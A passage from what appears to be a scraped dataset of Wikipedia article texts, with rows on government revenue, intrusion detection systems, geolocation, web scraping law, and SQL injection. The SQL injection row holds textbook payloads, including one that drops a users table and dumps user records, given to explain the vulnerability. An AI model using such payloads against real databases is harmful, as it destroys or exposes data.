quality. There are several financial ratios attached to it: Government revenue includes all amounts of money (i.e., taxes and fees) received from sources outside the government entity. Large governments usually have an agency or department responsible for collecting government revenue from companies and individuals. 9 Government revenue may also include reserve bank currency which is printed. This is recorded as an advance to the retail bank together with a corresponding currency in circulation expense entry, that is, the income derived from the Official Cash rate payable by the retail banks for instruments such as 90 day bills. There is a question as to whether using generic business-based accounting standards can give a fair and accurate picture of government accounts, in that with a monetary policy statement to the reserve bank directing a positive inflation rate, the expense provision for the return of currency to the reserve bank is largely symbolic, such that to totally cancel the currency in circulation provision, all currency would have to be returned to the reserve bank and canceled. |
588 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/File:Question_book-new.svg | Original file (SVG file, nominally 512 399 pixels, file size: 13 KB) The source code of this SVG is valid. English: A new incarnation of Image:Question book 3.svg, which was uploaded by user AzaToth Created from scratch in Adobe Illustrator. Based on Image:Question book.png created by User:Equazcion May 29, 2008 Tkgd2007 See licensing. GFDL GNU Free Documentation License en.wikipedia.org wiki Wikipedia:Text of the GNU Free Documentation License This licensing tag was added to this file as part of the GFDL licensing update. Click on a date time to view the file as it appeared at that time. You cannot overwrite this file. The following file is a duplicate of this file (more details): More than 100 pages use this file. The following list shows the first 100 pages that use this file only. A full list is available. View more links to this file. This file contains additional information, probably added from the digital camera or scanner used to create or digitize it. If the file has been modified from its original state, some details may not fully reflect the modified file. |
589 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Intrusion_detection_system | An intrusion detection system (IDS) is a device or software application that monitors a network or systems for malicious activity or policy violations. 1 Any intrusion activity or violation is typically either reported to an administrator or collected centrally using a security information and event management (SIEM) system. A SIEM system combines outputs from multiple sources and uses alarm filtering techniques to distinguish malicious activity from false alarms. 2 IDS types range in scope from single computers to large networks. 3 The most common classifications are network intrusion detection systems (NIDS) and host-based intrusion detection systems (HIDS). A system that monitors important operating system files is an example of an HIDS, while a system that analyzes incoming network traffic is an example of an NIDS. It is also possible to classify IDS by detection approach. The most well-known variants are signature-based detection (recognizing bad patterns, such as malware) and anomaly-based detection (detecting deviations from a model of "good" traffic, which often relies on machine learning). Another common variant is reputation-based detection (recognizing the potential threat according to the reputation scores). Some IDS products have the ability to respond to detected intrusions. Systems with response capabilities are typically referred to as an intrusion prevention system (IPS). 4 Intrusion detection systems can also serve specific purposes by augmenting them with custom tools, such as using a honeypot to attract and characterize malicious traffic. 5 Although they both relate to network security, an IDS differs from a firewall in that a conventional network firewall (distinct from a next-generation firewall) uses a static set of rules to permit or deny network connections. It implicitly prevents intrusions, assuming an appropriate set of rules have been defined. Essentially, firewalls limit access between networks to prevent intrusion and do not signal an attack from inside the network. An IDS describes a suspected intrusion once it has taken place and signals an alarm. An IDS also watches for attacks that originate from within a system. This is traditionally achieved by examining network communications, identifying heuristics and patterns (often known as signatures) of common computer attacks, and taking action to alert operators. A system that terminates connections is called an intrusion prevention system, and performs access control like an application layer firewall. 6 IDS can be classified by where detection takes place (network or host) or the detection method that is employed (signature or anomaly-based). 7 Network intrusion detection systems (NIDS) are placed at a strategic point or points within the network to monitor traffic to and from all devices on the network. 8 It performs an analysis of passing traffic on the entire subnet, and matches the traffic that is passed on the subnets to the library of known attacks. Once an attack is identified, or abnormal behavior is sensed, the alert can be sent to the administrator. NIDS function to safeguard every device and the entire network from unauthorized access. 9 An example of an NIDS would be installing it on the subnet where firewalls are located in order to see if someone is trying to break into the firewall. Ideally one would scan all inbound and outbound traffic, however doing so might create a bottleneck that would impair the overall speed of the network. OPNET and NetSim are commonly used tools for simulating network intrusion detection systems. NID Systems are also capable of comparing signatures for similar packets to link and drop harmful detected packets which have a signature matching the records in the NIDS. When we classify the design of the NIDS according to the system interactivity property, there are two types: on-line and off-line NIDS, often referred to as inline and tap mode, respectively. On-line NIDS deals with the network in real time. It analyses the Ethernet packets and applies some rules, to decide if it is an attack or not. Off-line NIDS deals with stored data and passes it through some processes to decide if it is an attack or not. NIDS can be also combined with other technologies to increase detection and prediction rates. Artificial Neural Network (ANN) based IDS are capable of analyzing huge volumes of data due to the hidden layers and non-linear modeling, however this process requires time due its complex structure. 10 This allows IDS to more efficiently recognize intrusion patterns. 11 Neural networks assist IDS in predicting attacks by learning from mistakes; ANN based IDS help develop an early warning system, based on two layers. The first layer accepts single values, while the second layer takes the first's layers output as input; the cycle repeats and allows the system to automatically recognize new unforeseen patterns in the network. 12 This system can average 99.9% detection and classification rate, based on research results of 24 network attacks, divided in four categories: DOS, Probe, Remote-to-Local, and user-to-root. 13 Host intrusion detection systems (HIDS) run on individual hosts or devices on the network. A HIDS monitors the inbound and outbound packets from the device only and will alert the user or administrator if suspicious activity is detected. It takes a snapshot of existing system files and matches it to the previous snapshot. If the critical system files were modified or deleted, an alert is sent to the administrator to investigate. An example of HIDS usage can be seen on mission critical machines, which are not expected to change their configurations. 14 15 Signature-based IDS is the detection of attacks by looking for specific patterns, such as byte sequences in network traffic, or known malicious instruction sequences used by malware. 16 This terminology originates from anti-virus software, which refers to these detected patterns as signatures. Although signature-based IDS can easily detect known attacks, it is difficult to detect new attacks, for which no pattern is available. 17 In signature-based IDS, the signatures are released by a vendor for all its products. On-time updating of the IDS with the signature is a key aspect. Anomaly-based intrusion detection systems were primarily introduced to detect unknown attacks, in part due to the rapid development of malware. The basic approach is to use machine learning to create a model of trustworthy activity, and then compare new behavior against this model. Since these models can be trained according to the applications and hardware configurations, machine learning based method has a better generalized property in comparison to traditional signature-based IDS. Although this approach enables the detection of previously unknown attacks, it may suffer from false positives: previously unknown legitimate activity may also be classified as malicious. Most of the existing IDSs suffer from the time-consuming during detection process that degrades the performance of IDSs. Efficient feature selection algorithm makes the classification process used in detection more reliable. 18 New types of what could be called anomaly-based intrusion detection systems are being viewed by Gartner as User and Entity Behavior Analytics (UEBA) 19 (an evolution of the user behavior analytics category) and network traffic analysis (NTA). 20 In particular, NTA deals with malicious insiders as well as targeted external attacks that have compromised a user machine or account. Gartner has noted that some organizations have opted for NTA over more traditional IDS. 21 Some systems may attempt to stop an intrusion attempt but this is neither required nor expected of a monitoring system. Intrusion detection and prevention systems (IDPS) are primarily focused on identifying possible incidents, logging information about them, and reporting attempts. In addition, organizations use IDPS for other purposes, such as identifying problems with security policies, documenting existing threats and deterring individuals from violating security policies. IDPS have become a necessary addition to the security infrastructure of nearly every organization. 22 IDPS typically record information related to observed events, notify security administrators of important observed events and produce reports. Many IDPS can also respond to a detected threat by attempting to prevent it from succeeding. They use several response techniques, which involve the IDPS stopping the attack itself, changing the security environment (e.g. reconfiguring a firewall) or changing the attack's content. 22 Intrusion prevention systems (IPS), also known as intrusion detection and prevention systems (IDPS), are network security appliances that monitor network or system activities for malicious activity. The main functions of intrusion prevention systems are to identify malicious activity, log information about this activity, report it and attempt to block or stop it. 23 . Intrusion prevention systems are considered extensions of intrusion detection systems because they both monitor network traffic and or system activities for malicious activity. The main differences are, unlike intrusion detection systems, intrusion prevention systems are placed in-line and are able to actively prevent or block intrusions that are detected. 24 : 273 25 : 289 IPS can take such actions as sending an alarm, dropping detected malicious packets, resetting a connection or blocking traffic from the offending IP address. 26 An IPS also can correct cyclic redundancy check (CRC) errors, defragment packet streams, mitigate TCP sequencing issues, and clean up unwanted transport and network layer options. 24 : 278 27 Intrusion prevention systems can be classified into four different types: 23 28 The majority of intrusion prevention systems utilize one of three detection methods: signature-based, statistical anomaly-based, and stateful protocol analysis. 25 : 301 29 The correct placement of intrusion detection systems is critical and varies depending on the network. The most common placement is behind the firewall, on the edge of a network. This practice provides the IDS with high visibility of traffic entering your network and will not receive any traffic between users on the network. The edge of the network is the point in which a network connects to the extranet. Another practice that can be accomplished if more resources are available is a strategy where a technician will place their first IDS at the point of highest visibility and depending on resource availability will place another at the next highest point, continuing that process until all points of the network are covered. 34 If an IDS is placed beyond a network's firewall, its main purpose would be to defend against noise from the internet but, more importantly, defend against common attacks, such as port scans and network mapper. An IDS in this position would monitor layers 4 through 7 of the OSI model and would be signature-based. This is a very useful practice, because rather than showing actual breaches into the network that made it through the firewall, attempted breaches will be shown which reduces the amount of false positives. The IDS in this position also assists in decreasing the amount of time it takes to discover successful attacks against a network. 35 Sometimes an IDS with more advanced features will be integrated with a firewall in order to be able to intercept sophisticated attacks entering the network. Examples of advanced features would include multiple security contexts in the routing level and bridging mode. All of this in turn potentially reduces cost and operational complexity. 35 Another option for IDS placement is within the actual network. These will reveal attacks or suspicious activity within the network. Ignoring the security within a network can cause many problems, it will either allow users to bring about security risks or allow an attacker who has already broken into the network to roam around freely. Intense intranet security makes it difficult for even those hackers within the network to maneuver around and escalate their privileges. 35 There are a number of techniques which attackers are using, the following are considered 'simple' measures which can be taken to evade IDS: The earliest preliminary IDS concept was delineated in 1980 by James Anderson at the National Security Agency and consisted of a set of tools intended to help administrators review audit trails. 39 User access logs, file access logs, and system event logs are examples of audit trails. Fred Cohen noted in 1987 that it is impossible to detect an intrusion in every case, and that the resources needed to detect intrusions grow with the amount of usage. 40 Dorothy E. Denning, assisted by Peter G. Neumann, published a model of an IDS in 1986 that formed the basis for many systems today. 41 Her model used statistics for anomaly detection, and resulted in an early IDS at SRI International named the Intrusion Detection Expert System (IDES), which ran on Sun workstations and could consider both user and network level data. 42 IDES had a dual approach with a rule-based Expert System to detect known types of intrusions plus a statistical anomaly detection component based on profiles of users, host systems, and target systems. The author of "IDES: An Intelligent System for Detecting Intruders", Teresa F. Lunt, proposed adding an artificial neural network as a third component. She said all three components could then report to a resolver. SRI followed IDES in 1993 with the Next-generation Intrusion Detection Expert System (NIDES). 43 The Multics intrusion detection and alerting system (MIDAS), an expert system using P-BEST and Lisp, was developed in 1988 based on the work of Denning and Neumann. 44 Haystack was also developed in that year using statistics to reduce audit trails. 45 In 1986 the National Security Agency started an IDS research transfer program under Rebecca Bace. Bace later published the seminal text on the subject, Intrusion Detection, in 2000. 46 Wisdom Sense (W S) was a statistics-based anomaly detector developed in 1989 at the Los Alamos National Laboratory. 47 W S created rules based on statistical analysis, and then used those rules for anomaly detection. In 1990, the Time-based Inductive Machine (TIM) did anomaly detection using inductive learning of sequential user patterns in Common Lisp on a VAX 3500 computer. 48 The Network Security Monitor (NSM) performed masking on access matrices for anomaly detection on a Sun 3 50 workstation. 49 The Information Security Officer's Assistant (ISOA) was a 1990 prototype that considered a variety of strategies including statistics, a profile checker, and an expert system. 50 ComputerWatch at AT T Bell Labs used statistics and rules for audit data reduction and intrusion detection. 51 Then, in 1991, researchers at the University of California, Davis created a prototype Distributed Intrusion Detection System (DIDS), which was also an expert system. 52 The Network Anomaly Detection and Intrusion Reporter (NADIR), also in 1991, was a prototype IDS developed at the Los Alamos National Laboratory's Integrated Computing Network (ICN), and was heavily influenced by the work of Denning and Lunt. 53 NADIR used a statistics-based anomaly detector and an expert system. The Lawrence Berkeley National Laboratory announced Bro in 1998, which used its own rule language for packet analysis from libpcap data. 54 Network Flight Recorder (NFR) in 1999 also used libpcap. 55 APE was developed as a packet sniffer, also using libpcap, in November, 1998, and was renamed Snort one month later. Snort has since become the world's largest used IDS IPS system with over 300,000 active users. 56 It can monitor both local systems, and remote capture points using the TZSP protocol. The Audit Data Analysis and Mining (ADAM) IDS in 2001 used tcpdump to build profiles of rules for classifications. 57 In 2003, Yongguang Zhang and Wenke Lee argue for the importance of IDS in networks with mobile nodes. 58 In 2015, Viegas and his colleagues 59 proposed an anomaly-based intrusion detection engine, aiming System-on-Chip (SoC) for applications in Internet of Things (IoT), for instance. The proposal applies machine learning for anomaly detection, providing energy-efficiency to a Decision Tree, Naive-Bayes, and k-Nearest Neighbors classifiers implementation in an Atom CPU and its hardware-friendly implementation in a FPGA. 60 61 In the literature, this was the first work that implement each classifier equivalently in software and hardware and measures its energy consumption on both. Additionally, it was the first time that was measured the energy consumption for extracting each features used to make the network packet classification, implemented in software and hardware. 62 This article incorporates public domain material from Karen Scarfone, Peter Mell. Guide to Intrusion Detection and Prevention Systems, SP800 94 (PDF). National Institute of Standards and Technology. Retrieved 1 January 2010. |
590 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Security-focused_operating_system | This is a list of operating systems specifically focused on security. Similar concepts include security-evaluated operating systems that have achieved certification from an auditing organization, and trusted operating systems that provide sufficient support for multilevel security and evidence of correctness to meet a particular set of requirements. |
591 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Geolocation | Geopositioning is the process of determining or estimating the geographic position of an object. 1 Geopositioning yields a set of geographic coordinates (such as latitude and longitude) in a given map datum; positions may also be expressed as a bearing and range from a known landmark. In turn, positions can determine a meaningful location, such as a street address. Specific instances include: animal geotracking, the process of inferring the location of animals over time; positioning system, the mechanisms for the determination of geographic positions in general; internet geolocation, geolocating a device connected to the internet; and mobile phone tracking. 2 Geopositioning uses various visual and electronic methods including position lines and position circles, celestial navigation, radio navigation, and the use of satellite navigation systems. The calculation requires measurements or observations of distances or angles to reference points whose positions are known. In 2D surveys, observations of three reference points are enough to compute a position in a two-dimensional plane. In practice, observations are subject to errors resulting from various physical and atmospheric factors that influence the measurement of distances and angles. 3 A practical example of obtaining a position fix would be for a ship to take bearing measurements on three lighthouses positioned along the coast. These measurements could be made visually using a hand bearing compass, or in case of poor visibility, electronically using radar or radio direction finding. Since all physical observations are subject to errors, the resulting position fix is also subject to inaccuracy. Although in theory two lines of position (LOP) are enough to define a point, in practice 'crossing' more LOPs provides greater accuracy and confidence, especially if the lines cross at a good angle to each other. Three LOPs are considered the minimum for a practical navigational fix. 4 The three LOPs when drawn on the chart will in general form a triangle, known as a 'cocked hat'. The navigator will have more confidence in a position fix that is formed by a small cocked hat with angles close to those of an equilateral triangle. 5 The area of doubt surrounding a position fix is called an error ellipse. To minimize the error, electronic navigation systems generally use more than three reference points to compute a position fix to increase the data redundancy. As more redundant reference points are added, the position fix becomes more accurate and the area of the resulting error ellipse decreases. 6 The process of combining multiple observations to compute a position fix is equivalent to solving a system of linear equations. Navigation systems use regression algorithms such as least squares in order to compute a position fix in 3D space. This is most commonly done by combining distance measurements to 4 or more GPS satellites, which orbit the Earth along known paths. 7 The result of position fixing is called a position fix (PF), or simply a fix, a position derived from measuring in relation to external reference points. 8 In nautical navigation, the term is generally used with manual or visual techniques, such as the use of intersecting visual or radio position lines, rather than the use of more automated and accurate electronic methods like GPS; in aviation, use of electronic navigation aids is more common. A visual fix can be made by using any sighting device with a bearing indicator. Two or more objects of known position are sighted, and the bearings recorded. Bearing lines are then plotted on a chart through the locations of the sighted items. The intersection of these lines is the current position of the vessel. Usually, a fix is where two or more position lines intersect at any given time. If three position lines can be obtained, the resulting "cocked hat", where the three lines do not intersect at the same point, but create a triangle, gives the navigator an indication of the accuracy. The most accurate fixes occur when the position lines are perpendicular to each other. Fixes are a necessary aspect of navigation by dead reckoning, which relies on estimates of speed and course. The fix confirms the actual position during a journey. A fix can introduce inaccuracies if the reference point is not correctly identified or is inaccurately measured. |
592 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-13 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
593 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/SQL_injection | In computing, SQL injection is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). 1 2 SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database. SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server. Document-oriented NoSQL databases can also be affected by this security vulnerability. 3 In a 2012 study, it was observed that the average web application received four attack campaigns per month, and retailers received twice as many attacks as other industries. 4 Discussions of SQL injection, such as a 1998 article in Phrack Magazine, began in the late 1990s. 5 SQL injection was considered one of the top 10 web application vulnerabilities of 2007 and 2010 by the Open Web Application Security Project. 6 In 2013, SQL injection was rated the number one attack on the OWASP top ten. 7 SQL Injection is a common security vulnerability that arises from predominantly poor (or missing) input validation. Given that arbitrary SQL code can be supplied, it can be devastating. SQL Code can be constructed to extract all information from the target system, alter information, destroy information, and under the right circumstances even gain a remote shell onto the database server itself. 8 This form of injection relies on the fact that SQL statements consist of both data used by the SQL statement and commands that control how the SQL statement is executed. For example, in the SQL statement select from person where name 'susan' and age 2 the string 'susan' is data and the fragment and age 2 is an example of a command (the value 2 is also data in this example). SQL injection occurs when specially crafted user input is processed by the receiving program in a way that allows the input to exit a data context and enter a command context. This allows the attacker to alter the structure of the SQL statement which is executed. As a simple example, imagine that the data 'susan' in the above statement was provided by user input. The user entered the string 'susan' (without the apostrophes) in a web form text entry field, and the program used string concatenation statements to form the above SQL statement from the three fragments select from person where name , the user input of 'susan', and and age 2. Now imagine that instead of entering 'susan' the attacker entered or 1 1; . The program will use the same string concatenation approach with the 3 fragments of select from person where name , the user input of or 1 1; , and and age 2 and construct the statement select from person where name or 1 1; and age 2. Many databases will ignore the text after the string as this denotes a comment. The structure of the SQL command is now select from person where name or 1 1; and this will select all person rows rather than just those named 'susan' whose age is 2. The attacker has managed to craft a data string which exits the data context and entered a command context. A more complex example is now presented. Imagine a program creates a SQL statement using the following string assignment command : var statement "SELECT FROM users WHERE name userName ; This SQL code is designed to pull up the records of the specified username from its table of users. However, if the "userName" variable is crafted in a specific way by a malicious user, the SQL statement may do more than the code author intended. For example, setting the "userName" variable as: or using comments to even block the rest of the query (there are three types of SQL comments 9 ). All three lines have a space at the end: renders one of the following SQL statements by the parent language: If this code were to be used in authentication procedure then this example could be used to force the selection of every data field ( ) from all users rather than from one specific user name as the coder intended, because the evaluation of '1' '1' is always true. The following value of "userName" in the statement below would cause the deletion of the "users" table as well as the selection of all data from the "userinfo" table (in essence revealing the information of every user), using an API that allows multiple statements: a';DROP TABLE users; SELECT FROM userinfo WHERE 't' 't This input renders the final SQL statement as follows and specified: While most SQL server implementations allow multiple statements to be executed with one call in this way, some SQL APIs such as PHP's mysql query() function do not allow this for security reasons. This prevents attackers from injecting entirely separate queries, but doesn't stop them from modifying queries. Blind SQL injection is used when a web application is vulnerable to a SQL injection, but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack has traditionally been considered time-intensive because a new statement needed to be crafted for each bit recovered, and depending on its structure, the attack may consist of many unsuccessful requests. Recent advancements have allowed each request to recover multiple bits, with no unsuccessful requests, allowing for more consistent and efficient extraction. 10 There are several tools that can automate these attacks once the 